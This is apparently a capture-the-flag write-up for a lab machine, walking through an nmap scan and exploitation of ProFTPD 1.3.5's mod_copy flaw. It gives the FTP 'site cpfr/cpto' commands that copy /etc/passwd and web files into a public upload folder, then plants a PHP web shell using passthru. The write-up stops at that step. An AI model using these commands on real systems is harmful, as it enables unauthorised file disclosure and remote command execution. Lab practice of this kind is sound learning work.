HackerEnv Target: samba#4 Write Up

Nouf

3 min readNov 3, 2020

Let’s do Samba Machine in this write up.

As always, started with nmap to figure open ports

nmap -sT -A -p- -T5 10.0.101.2

* 10.0.101.2 is samba IP

we got 21 open and running ProFTPD 1.3.5!

ProFTPD 1.3.5 is vulnerable, it has mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

Let’s take advantage of this vulnerability, I started by initiating a FTP connection and press enter when it asked about username and password

ftp 10.0.101.2

I started by trying to copy the content of /etc/passwd by

site cpfr /etc/passwd

and paste it in the upload directory by

site cpto /var/www/html/upload/nouf

/var/www/html/upload is writable directory in the target
nouf is the file the I pasted password in it.

By visiting the /upload, my password file is there “nouf”

so I opened it to see its content and bengoo

As it is stated in the instruction’ page, the flags will be in these two directories.

I will start with the user flag, I will copy the content of /var/www by

site cpfr /var/www

and paste it in the website by

site cpto /var/www/html/upload/userflag

and here is userflag folder which has the content of /var/www

I opened userflag folder and user flag appeared

so now we want root flag, and we will absolutely need root privilege to obtain it. Let’s have an access to the machine by uploading an executable php file

site cpfr /proc/self/cmdline
site cpto /tmp/. <?php echo passthru($_GET[‘cmd’]); ?>
site cpfr /tmp/. <?php echo passthru($_GET[‘cmd’]); ?>
site cpto /var/www/html/upload/en.php